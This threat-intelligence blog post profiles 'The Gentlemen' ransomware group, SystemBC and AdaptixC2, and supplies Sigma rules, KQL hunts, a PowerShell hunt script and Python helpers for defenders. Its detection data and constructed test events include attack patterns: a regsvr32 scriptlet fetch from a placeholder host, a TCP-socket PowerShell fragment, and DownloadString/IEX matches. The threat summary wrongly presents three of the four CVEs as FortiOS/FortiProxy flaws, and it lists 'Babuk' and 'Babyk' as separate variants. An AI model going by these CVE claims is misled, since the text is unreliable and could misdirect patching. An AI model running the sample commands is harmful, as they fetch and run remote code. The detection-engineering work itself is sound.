
The Gentlemen RaaS & AdaptixC2 Framework: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
April 20, 2026
7 min read

Threat Summary

Recent OTX pulse data reveals a sophisticated ransomware-as-a-service (RaaS) operation by threat actor "The Gentlemen" that has rapidly expanded since mid-2025, claiming over 320 victims with 240 attacks occurring in early 2026 alone. The Gentlemen exploit critical vulnerabilities in FortiOS/FortiProxy (CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, CVE-2025-32463) for initial access, then deploy SystemBC proxy malware for covert tunneling alongside Cobalt Strike beacons. Of particular concern is the group's adoption of AdaptixC2, an emerging open-source post-exploitation framework that supports Windows, macOS, and Linux with extensive modularity through Beacon Object Files (BOFs).

The attack chain typically begins with exploiting public-facing applications, particularly Fortinet infrastructure, followed by deployment of SystemBC for establishing encrypted tunnels to C2 infrastructure. The Gentlemen then use Cobalt Strike, Mimikatz, AnyDesk, and PsExec for lateral movement and privilege escalation, ultimately deploying multiple ransomware variants (Babuk, Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa) that target Windows, Linux, NAS, BSD, and ESXi platforms.

Threat Actor / Malware Profile

The Gentlemen

  • Distribution Method: Primarily exploits FortiOS/FortiProxy vulnerabilities (CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, CVE-2025-32463)
  • Attack Vector: Public-facing application exploitation, particularly targeting Fortinet infrastructure
  • Persistence Mechanism: SystemBC for tunneling, Cobalt Strike beacons, scheduled tasks
  • C2 Communication: Uses SystemBC for covert proxy tunneling to C2 infrastructure with RC4 encryption
  • Anti-Analysis Techniques: Advanced defense evasion; rotates through multiple malware families so that no single signature covers the whole intrusion
  • Ransomware Variants: Babuk, Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa

SystemBC

  • Payload Behavior: Lightweight proxy malware used for establishing encrypted tunnels
  • C2 Communication: RC4-encrypted communications through covert channels
  • Persistence: Often deployed as a scheduled task or service to maintain access
  • Capabilities: Traffic redirection, tunneling, data exfiltration

AdaptixC2

  • Distribution Method: Deployed during post-exploitation phase by multiple threat actors
  • Platform Support: Windows, macOS, Linux (written in Go and C++)
  • C2 Communication: HTTP/S, TCP, mTLS, DNS, DoH, and SMB with RC4 encryption
  • Modularity: Beacon Object Files (BOFs) for extensive functionality
  • Associated Malware: MgBot, CoolClient, ToneShell, VBShower, VBCloud, PowerShower, CloudAtlas

Cobalt Strike

  • Payload Behavior: Commercial penetration testing tool abused for C2 and lateral movement
  • C2 Communication: Customizable communication channels (HTTP, DNS, SMB, etc.)
  • Capabilities: Process injection, privilege escalation, lateral movement
  • Common Artifacts: PowerShell beacons, reflective DLL injection

IOC Analysis

The OTX pulses provide a mix of indicator types that SOC teams should operationalize immediately:

  • File Hashes (MD5, SHA1, SHA256): Multiple file hashes for SystemBC, AdaptixC2, and The Gentlemen ransomware samples
  • CVE Identifiers: Key vulnerabilities exploited by The Gentlemen for initial access
  • No IP/Domain Indicators: The pulses don't include direct IP or domain indicators, suggesting focus on malware samples rather than C2 infrastructure

SOC teams should:

  1. Import all file hashes into EDR systems for immediate scanning
  2. Ensure vulnerability management platforms have flagged the listed CVEs
  3. Use threat hunting to search for SystemBC and AdaptixC2 behavioral indicators
  4. Implement memory scanning for Cobalt Strike beacons and BOFs

The absence of explicit C2 infrastructure indicators in these pulses suggests that SOC teams should focus on behavioral detection rather than just blocklisting domains/IPs.
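The first SOC action above (import the pulse hashes into EDR) is where malformed or mixed-case indicators quietly break a blocklist. The following is an added example, not code from the original post or from OTX: it parses a pulse in the real OTX export shape (a JSON object whose "indicators" list carries "indicator" and "type" fields such as "FileHash-SHA256"), validates each hash by type, deduplicates case variants, separates the CVE entries for the vulnerability-management check, and renders the clean set as a Sigma `Hashes|contains` selection in Sysmon's `ALG=HEX` format. The pulse content itself is constructed with placeholder hashes; no real sample hashes appear.

```python
"""Normalize OTX pulse file-hash indicators into EDR- and Sigma-ready lists.

Added example, not part of the original post. The pulse JSON shape follows the
OTX export format; the indicator values below are constructed placeholders.
"""
import json
import re
from collections import defaultdict

# Expected hex length per OTX file-hash indicator type.
HASH_TYPES = {
    "FileHash-MD5": 32,
    "FileHash-SHA1": 40,
    "FileHash-SHA256": 64,
}
HEX_RE = re.compile(r"^[0-9a-f]+$")

# Constructed pulse payload with placeholder hashes (not real IoCs).
SAMPLE_PULSE = json.dumps({
    "name": "Constructed pulse (placeholder indicators)",
    "indicators": [
        {"indicator": "A" * 64, "type": "FileHash-SHA256", "title": "SystemBC loader (placeholder)"},
        {"indicator": "a" * 64, "type": "FileHash-SHA256", "title": "same hash, different case"},
        {"indicator": "b" * 40, "type": "FileHash-SHA1", "title": "AdaptixC2 agent (placeholder)"},
        {"indicator": "c" * 32, "type": "FileHash-MD5", "title": "ransomware sample (placeholder)"},
        {"indicator": "zz" * 16, "type": "FileHash-MD5", "title": "malformed: non-hex"},
        {"indicator": "d" * 63, "type": "FileHash-SHA256", "title": "malformed: truncated"},
        {"indicator": "CVE-2024-55591", "type": "CVE", "title": "not a hash, handled separately"},
    ],
})


def extract_hashes(pulse_json: str):
    """Return (valid, rejected).

    valid maps hash type -> sorted unique lowercase hashes; rejected lists
    (indicator, reason) for entries that would poison an EDR blocklist."""
    pulse = json.loads(pulse_json)
    valid = defaultdict(set)
    rejected = []
    for ind in pulse.get("indicators", []):
        itype = ind.get("type", "")
        if itype not in HASH_TYPES:
            continue  # CVEs, domains, etc. belong to other pipelines
        value = ind.get("indicator", "").strip().lower()
        if len(value) != HASH_TYPES[itype]:
            rejected.append((value, f"{itype}: expected {HASH_TYPES[itype]} hex chars, got {len(value)}"))
            continue
        if not HEX_RE.match(value):
            rejected.append((value, f"{itype}: non-hex characters"))
            continue
        valid[itype].add(value)
    return {k: sorted(v) for k, v in valid.items()}, rejected


def extract_cves(pulse_json: str):
    """Return the CVE identifiers in the pulse for the vulnerability-management check."""
    pulse = json.loads(pulse_json)
    return sorted({i["indicator"] for i in pulse.get("indicators", []) if i.get("type") == "CVE"})


def to_sigma_hashes_rule(valid: dict) -> str:
    """Render validated hashes as a Sigma selection over Sysmon's Hashes field,
    whose entries look like 'SHA256=<HEX>' or 'MD5=<HEX>'."""
    lines = ["detection:", "    selection:", "        Hashes|contains:"]
    for itype, hashes in sorted(valid.items()):
        tag = itype.split("-")[1]  # MD5 / SHA1 / SHA256
        for h in hashes:
            lines.append(f"            - '{tag}={h.upper()}'")
    lines.append("    condition: selection")
    return "\n".join(lines)


if __name__ == "__main__":
    valid, rejected = extract_hashes(SAMPLE_PULSE)
    for itype, hashes in valid.items():
        print(f"{itype}: {len(hashes)} unique")
    for value, reason in rejected:
        print(f"rejected {value[:16]}...: {reason}")
    print("CVEs:", extract_cves(SAMPLE_PULSE))
    print(to_sigma_hashes_rule(valid))
```

Feeding a real pulse through this before import keeps the two common failure modes out of the EDR list: a truncated or pasted-with-whitespace hash that never matches anything, and the same SHA256 appearing twice in different case.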

Detection Engineering

```yaml
---
title: Potential SystemBC Proxy Installation
id: 6a4b3c2d-1e5f-4a8b-9c6d-7e8f0a1b2c3d
description: Detects potential installation of SystemBC proxy malware, which is frequently used by The Gentlemen ransomware gang for covert tunneling
author: Security Arsenal
date: 2026/04/20
references:
    - https://otx.alienvault.com/pulse/662291653e07e0b3143d9d6c/
tags:
    - attack.command_and_control
    - attack.t1071
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # A list of values under one field is an OR in Sigma; inline "or" is not valid syntax
        ParentImage|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
        CommandLine|contains|all:
            - 'regsvr32.exe'
            - '/s'
            - '/i'
        CommandLine|contains:
            - 'http://'
            - 'scrobj.dll'
    condition: selection
falsepositives:
    - Legitimate administrative tasks
level: high
---
title: Suspicious AdaptixC2 Framework Activity
id: 5d4c3b2a-0f4e-3d7a-8b5c-6d7e0a1b2c3d
description: Detects potential AdaptixC2 framework activity, a post-exploitation tool increasingly used by APT groups and ransomware operators
author: Security Arsenal
date: 2026/04/20
references:
    - https://otx.alienvault.com/pulse/6622f6653e07e0b3143d9d6c/
tags:
    - attack.execution
    - attack.t1059
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains|all:
            - 'New-Object'
            - 'System.Net.Sockets.TCPClient'
            - 'GetStream'
            - 'Read'
    condition: selection
falsepositives:
    - Legitimate PowerShell network operations
level: medium
---
title: The Gentlemen Ransomware Activity Pattern
id: 4e3d2c1b-9f3d-2c6a-7b4a-5c6d0e1f2a3b
description: Detects activity patterns associated with The Gentlemen ransomware gang, including their use of SystemBC, Cobalt Strike, and AnyDesk
author: Security Arsenal
date: 2026/04/20
references:
    - https://otx.alienvault.com/pulse/662291653e07e0b3143d9d6c/
    - https://otx.alienvault.com/pulse/6622917f3e07e0b3143d9d6c/
tags:
    - attack.impact
    - attack.t1486
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection_anydesk:
        Image|endswith: '\anydesk.exe'
        CommandLine|contains: 'start'
    selection_psexec:
        Image|endswith: '\psexec.exe'
        CommandLine|contains: '-accepteula'
    selection_cobaltstrike:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
    condition: 1 of selection_*
falsepositives:
    - Authorized remote administration tools
level: high
```
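Before shipping these rules, it is worth seeing exactly which command lines they will and will not fire on. The following is an added example, not part of the original post and not Sigma's own tooling: a minimal evaluator for the modifiers the three rules use (`endswith`, `contains`, `contains|all`, a value list as OR, and `1 of selection_*`), run over constructed process_creation events in the Sigma field taxonomy (Image, ParentImage, CommandLine). The events, hostnames (`*.invalid`) and paths are constructed; production conversion should go through sigma-cli or pySigma, this only replays the selection logic.

```python
"""Replay the detection pack's Sigma selection logic over constructed events.

Added example, not from the original post. Events are hand-built; they are not
telemetry from any real incident.
"""
from typing import Dict, List, Union

Event = Dict[str, str]
Spec = Union[str, List[str]]


def field_matches(value: str, spec_key: str, spec_val: Spec) -> bool:
    """Apply one 'Field|modifier...' entry to a field value.

    Sigma string matching is case-insensitive; a list of values is OR unless
    the 'all' modifier is present."""
    value = value.lower()
    modifiers = spec_key.split("|")[1:]
    candidates = [v.lower() for v in (spec_val if isinstance(spec_val, list) else [spec_val])]
    if "endswith" in modifiers:
        results = [value.endswith(c) for c in candidates]
    elif "contains" in modifiers:
        results = [c in value for c in candidates]
    else:
        results = [value == c for c in candidates]
    return all(results) if "all" in modifiers else any(results)


def selection_matches(event: Event, selection: Dict[str, Spec]) -> bool:
    """Every key inside one selection map must hold (AND)."""
    return all(field_matches(event.get(key.split("|")[0], ""), key, val)
               for key, val in selection.items())


# The three rules' selections, transcribed from the YAML above. Both
# 'condition: selection' and '1 of selection_*' reduce to "any selection holds".
RULES = [
    ("Potential SystemBC Proxy Installation", {"selection": {
        "ParentImage|endswith": ["\\cmd.exe", "\\powershell.exe"],
        "CommandLine|contains|all": ["regsvr32.exe", "/s", "/i"],
        "CommandLine|contains": ["http://", "scrobj.dll"],
    }}),
    ("Suspicious AdaptixC2 Framework Activity", {"selection": {
        "Image|endswith": "\\powershell.exe",
        "CommandLine|contains|all": ["New-Object", "System.Net.Sockets.TCPClient", "GetStream", "Read"],
    }}),
    ("The Gentlemen Ransomware Activity Pattern", {
        "selection_anydesk": {"Image|endswith": "\\anydesk.exe", "CommandLine|contains": "start"},
        "selection_psexec": {"Image|endswith": "\\psexec.exe", "CommandLine|contains": "-accepteula"},
        "selection_cobaltstrike": {"Image|endswith": ["\\powershell.exe", "\\cmd.exe"],
                                   "CommandLine|contains": ["DownloadString", "IEX"]},
    }),
]


def evaluate(event: Event) -> List[str]:
    """Return the titles of every rule whose condition holds for the event."""
    return [title for title, selections in RULES
            if any(selection_matches(event, sel) for sel in selections.values())]


# Constructed events (placeholder hosts under the reserved .invalid TLD).
SAMPLE_EVENTS = [
    {  # scriptlet-via-regsvr32 pattern the first rule targets
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"regsvr32.exe /s /n /u /i:http://placeholder.invalid/x.sct scrobj.dll",
    },
    {  # benign COM registration during an install: wrong parent, no /i, no URL
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"',
    },
    {  # raw TCP socket handling from a PowerShell command line (truncated fragment)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -NoProfile -Command \"$c = New-Object System.Net.Sockets.TCPClient(...); $s = $c.GetStream(); $s.Read(...)\"",
    },
    {  # AnyDesk's own autostart flag contains 'start', so selection_anydesk fires on it
        "Image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --start-with-win',
    },
    {  # routine PowerShell download without IEX or DownloadString
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -Command Invoke-WebRequest -Uri https://updates.placeholder.invalid/patch.msi -OutFile patch.msi",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['CommandLine'][:60]:<60} -> {evaluate(ev) or 'no match'}")
```

Two things the replay makes visible that the YAML alone does not: the third rule's `CommandLine|contains: 'start'` fires on AnyDesk's ordinary autostart flag, so it needs an allowlist of managed installs before it is worth a high-severity alert, and the second rule's bare `'Read'` term is a substring match that will also hit command lines mentioning "thread", "ready" or "readme".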


```kql
// Hunt for SystemBC network connections (Microsoft Defender advanced hunting)
// 443, 80 and 53 are also the busiest legitimate ports; treat hits as pivots
// that need process and destination context, not as alerts on their own.
DeviceNetworkEvents
| where ActionType == "ConnectionSuccess"
| where RemotePort in (443, 8080, 8888, 53)
| where InitiatingProcessFileName in~ ("powershell.exe", "cmd.exe", "regsvr32.exe")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| order by Timestamp desc

// Search for AdaptixC2 related processes
DeviceProcessEvents
| where ProcessCommandLine has "New-Object" and ProcessCommandLine has "System.Net.Sockets.TCPClient"
| where ProcessCommandLine has "GetStream" or ProcessCommandLine has "Read"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for The Gentlemen related tool usage
DeviceProcessEvents
| where FileName in~ ("anydesk.exe", "psexec.exe")
| where ProcessCommandLine has "-accepteula" or ProcessCommandLine has "start"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```


```powershell
# The Gentlemen IOC Hunt Script
# Run elevated on the host under investigation; output is a set of hunting leads, not verdicts.

# Check for SystemBC artifacts
$systembcPaths = @(
    "$env:TEMP\scrobj.dll",
    "$env:APPDATA\SystemBC",
    "$env:LOCALAPPDATA\SystemBC"
)

foreach ($path in $systembcPaths) {
    if (Test-Path $path) {
        Write-Host "ALERT: Potential SystemBC artifact found at $path"
        # Get-FileHash only accepts files; directories are reported without a hash
        if (Test-Path $path -PathType Leaf) {
            $fileHash = Get-FileHash -Path $path -Algorithm SHA256
            Write-Host "File Hash: $($fileHash.Hash)"
        }
    }
}

# Check for SystemBC scheduled tasks (Actions is an array; -like filters each element)
$scheduledTasks = Get-ScheduledTask | Where-Object {
    ($_.Actions.Execute -like "*SystemBC*") -or ($_.Actions.WorkingDirectory -like "*SystemBC*")
}
if ($scheduledTasks) {
    Write-Host "ALERT: Potential SystemBC scheduled tasks found:"
    $scheduledTasks | ForEach-Object {
        Write-Host "Task Name: $($_.TaskName)"
        Write-Host "Task Path: $($_.TaskPath)"
    }
}

# Check for AdaptixC2 indicators in the Run keys.
# Run entries are registry values, not subkeys, so Test-Path on "...\Run\AdaptixC2"
# would never match; enumerate the values of each Run key instead.
$runKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
)

foreach ($key in $runKeys) {
    if (Test-Path $key) {
        (Get-ItemProperty -Path $key).PSObject.Properties |
            Where-Object { $_.Name -notlike "PS*" -and ($_.Name -like "*AdaptixC2*" -or $_.Value -like "*AdaptixC2*") } |
            ForEach-Object {
                Write-Host "ALERT: Potential AdaptixC2 persistence entry in ${key}: $($_.Name) = $($_.Value)"
            }
    }
}

# Check for established connections to ports SystemBC has been observed using.
# The port must be checked on the remote side (the original netstat parse read the local port),
# and these ports are also common legitimate ones, so correlate with the owning process.
$systembcPorts = @(443, 8080, 8888, 53, 80)
$suspiciousConnections = Get-NetTCPConnection -State Established |
    Where-Object { $systembcPorts -contains $_.RemotePort } |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            RemoteAddress = $_.RemoteAddress
            RemotePort    = $_.RemotePort
            PID           = $_.OwningProcess
            Process       = if ($proc) { $proc.ProcessName } else { "<unknown>" }
        }
    }

if ($suspiciousConnections) {
    Write-Host "ALERT: Potential SystemBC network connections detected:"
    $suspiciousConnections | Format-Table -AutoSize
}
```

Response Priorities

Immediate Actions:

  1. Block all file hashes listed in the IOCs across endpoints and network
  2. Apply patches for CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, and CVE-2025-32463 immediately
  3. Hunt for SystemBC artifacts and persistence mechanisms on critical systems
  4. Check Fortinet devices for indicators of compromise

24 Hours:

  1. Conduct comprehensive scan for AdaptixC2 framework indicators
  2. Review firewall and proxy logs for suspicious connections related to C2 infrastructure
  3. Validate any unauthorized remote access tools (AnyDesk, PsExec) in the environment
  4. Isolate systems with potential Cobalt Strike beacons

1 Week:

  1. Review and harden Fortinet configurations, especially public-facing services
  2. Implement behavioral detection for SystemBC and AdaptixC2 activity patterns
  3. Update incident response playbooks to address The Gentlemen TTPs
  4. Conduct threat hunting exercises focusing on ransomware precursors
  5. Review and restrict the use of remote administration tools to authorized systems only
